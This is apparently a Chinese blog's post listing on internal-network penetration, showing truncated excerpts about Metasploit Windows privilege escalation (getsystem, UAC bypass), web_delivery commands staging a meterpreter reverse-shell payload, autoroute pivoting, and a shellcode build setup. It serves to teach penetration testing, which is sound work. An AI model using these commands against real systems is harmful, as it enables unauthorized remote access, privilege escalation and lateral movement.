内网
multi4
这个作者很懒,什么都没留下…
展开
-
msf windows提权方法总结
简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等1.getsystem这里使用getsystem命令试一下,运气好的话可能就提到了system2.bypassuac内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要原创 2021-06-18 20:21:36 · 2811 阅读 · 2 评论 -
msf 上线方法
首先选中模块use exploit/multi/script/web_deliveryroot@kali:~# msfconsole msf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/x64/meterpreter/revers原创 2021-06-18 18:24:54 · 1179 阅读 · 0 评论 -
msf 自动添加路由
use post/multi/manage/autoroute原创 2021-06-07 23:07:00 · 1072 阅读 · 0 评论 -
shellcode 环境搭建
什么是shellcode1、 独立的存在,无需任何文件格式的包装2、内存中运行,无需固定指定的宿主进程shellcode的基本特点1、短小精悍2、灵活多变shellcode 生成方法shellcode 环境配置简单生成一个简单的程序int main(){ return 0;}生成文件这里发现一个简单的程序自动生成了这么多文件,所以我们应该想个办法清除这些文件修改入口点关闭缓冲区安全检查重新生成发现生成的文件变小了很多放进ida里面去分析,然后只有一个sta原创 2021-05-20 23:04:30 · 251 阅读 · 0 评论